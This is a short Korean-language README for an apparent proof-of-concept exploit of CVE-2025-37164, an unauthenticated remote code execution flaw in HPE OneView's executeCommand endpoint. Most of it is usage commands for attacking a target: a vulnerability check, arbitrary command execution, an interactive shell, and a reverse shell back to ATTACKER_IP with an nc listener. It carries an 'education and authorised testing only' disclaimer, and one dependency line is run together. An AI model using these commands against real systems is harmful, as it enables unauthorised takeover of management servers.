
CVE-2025-37164에 대한 개념 증명 익스플로잇으로, /rest/id-pools/executeCommand 엔드포인트를 통한 HPE OneView의 치명적인 인증되지 않은 원격 코드 실행 취약점입니다.
CVE-2025-37164에 대한 PoC 익스플로잇입니다. 이는 HPE OneView의 치명적인 (CVSS 10.0) 인증되지 않은 원격 코드 실행 취약점입니다.
본 소프트웨어는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
기술 분석: 이 취약점은 인증이 필요하지 않은 PUT /rest/id-pools/executeCommand 엔드포인트에 존재하며, 사용자 제어 입력을 Runtime.exec()로 직접 전달합니다.
requests 라이브러리 ()pip install requests# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check
# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"
# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i
# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444